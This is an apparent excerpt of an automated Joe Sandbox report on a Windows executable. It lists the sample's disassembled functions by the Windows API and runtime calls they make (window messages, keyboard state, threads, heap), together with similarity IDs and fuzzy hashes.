                                                                                                                    • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 87235514-0
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                                                                                    • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                                                                                    • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                                                                                    • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                    • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                    • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                    • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                    Similarity
                                                                                                                    • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2354583917-0
                                                                                                                    APIs
                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                                                                                    • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                                                                                    • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                    • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Enable$Show$MessageMoveSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 896007046-0
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                                                                                    • GetFocus.USER32 ref: 00448ACF
                                                                                                                    • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                    • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Enable$Show$FocusMessageSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3429747543-0
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                                                                                      • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                                                                                      • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                                                    • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                                                                                    • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                                                                                    • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                                                                                    • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                                                                                    • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                                                                                    Similarity
                                                                                                                    • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3300667738-0
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                                                                                    • __swprintf.LIBCMT ref: 0045D4E9
                                                                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                    • String ID: %lu$\VH
                                                                                                                    • API String ID: 3164766367-2432546070
                                                                                                                    • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                                                    • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                                                                                    • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                                                    • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                                                                                    • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend
                                                                                                                    • String ID: Msctls_Progress32
                                                                                                                    • API String ID: 3850602802-3636473452
                                                                                                                    • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                                                    • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                                                                                    • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                                                    • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                                                                                    APIs
                                                                                                                    • _malloc.LIBCMT ref: 0041F707
                                                                                                                      • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                                      • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                                      • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                    • _free.LIBCMT ref: 0041F71A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap_free_malloc
                                                                                                                    • String ID: [B
                                                                                                                    • API String ID: 1020059152-632041663
                                                                                                                    • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                                                                    • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                                                                                    • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                                                                    • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                                                                                    APIs
                                                                                                                    • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                                                                                    • __calloc_crt.LIBCMT ref: 00413DB0
                                                                                                                    • __getptd.LIBCMT ref: 00413DBD
                                                                                                                    • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                                                                                    • _free.LIBCMT ref: 00413E07
                                                                                                                    • __dosmaperr.LIBCMT ref: 00413E12
                                                                                                                      • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 155776804-0
                                                                                                                    • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                                                                    • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                                                                                    • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                                                                    • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                                                                                      • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                                                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1957940570-0
                                                                                                                    • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                                                    • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                                                                                    • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                                                    • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                                                                                    APIs
                                                                                                                    • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                                                                      • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                      • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                    • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                                                                      • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                    • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                                                                    • ExitThread.KERNEL32 ref: 00413D4E
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                                                                    • __freefls@4.LIBCMT ref: 00413D74
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 259663610-0
                                                                                                                    • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                                                                    • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                                                                                    • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                                                                    • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                                                                                    APIs
                                                                                                                    • GetClientRect.USER32(?,?), ref: 004302E6
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                                                                                    • GetClientRect.USER32(?,?), ref: 00430364
                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004303C3
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 004303EC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: Rect$Client$Window$MetricsScreenSystem
• String ID:
• API String ID: 3220332590-0
APIs
Similarity
• API ID: _malloc_wcslen$_strcat_wcscpy
• String ID:
• API String ID: 1612042205-0
APIs
Strings
Similarity
• API ID: _memmove_strncmp
• String ID: >$U$\
• API String ID: 2666721431-237099441
APIs
• GetKeyboardState.USER32(?), ref: 0044C570
• SetKeyboardState.USER32(00000080), ref: 0044C594
• PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
• PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
• PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
• SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
Similarity
• API ID: MessagePost$KeyboardState$InputSend
• String ID:
• API String ID: 2221674350-0
APIs
Similarity
• API ID: _wcscpy$_wcscat
• String ID:
• API String ID: 2037614760-0
APIs
• GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
• VariantCopy.OLEAUT32(?,?), ref: 00451BF8
• VariantCopy.OLEAUT32(?,?), ref: 00451C0E
• VariantCopy.OLEAUT32(?,?), ref: 00451C27
• VariantClear.OLEAUT32(?), ref: 00451CA1
• SysAllocString.OLEAUT32(00000000), ref: 00451CBA
Similarity
• API ID: Variant$Copy$AllocClearErrorLastString
• String ID:
• API String ID: 960795272-0
APIs
• BeginPaint.USER32(00000000,?), ref: 00447BDF
• GetWindowRect.USER32(?,?), ref: 00447C5D
• ScreenToClient.USER32(?,?), ref: 00447C7B
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
• EndPaint.USER32(?,?), ref: 00447D13
Similarity
• API ID: Paint$BeginClientRectRectangleScreenViewportWindow
• String ID:
• API String ID: 4189319755-0
APIs
• SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
• SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
• SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
• InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
• GetWindowLongW.USER32(?,000000F0), ref: 004490D4
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$LongWindow$InvalidateRect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1976402638-0
                                                                                                                    • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                                                    • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                                                                                    • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                                                    • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                                                                                    APIs
                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                                                                                    • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                                                                                    • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                                                                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 642888154-0
                                                                                                                    • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                                    • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                                                                                    • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                                    • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$Copy$ClearErrorLast
                                                                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                    • API String ID: 2487901850-572801152
                                                                                                                    • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                                    • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                                                                                    • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                                    • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                                                                                    • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                    • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Enable$Show$MessageSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1871949834-0
                                                                                                                    • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                                                    • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                                                                                    • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                                                    • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
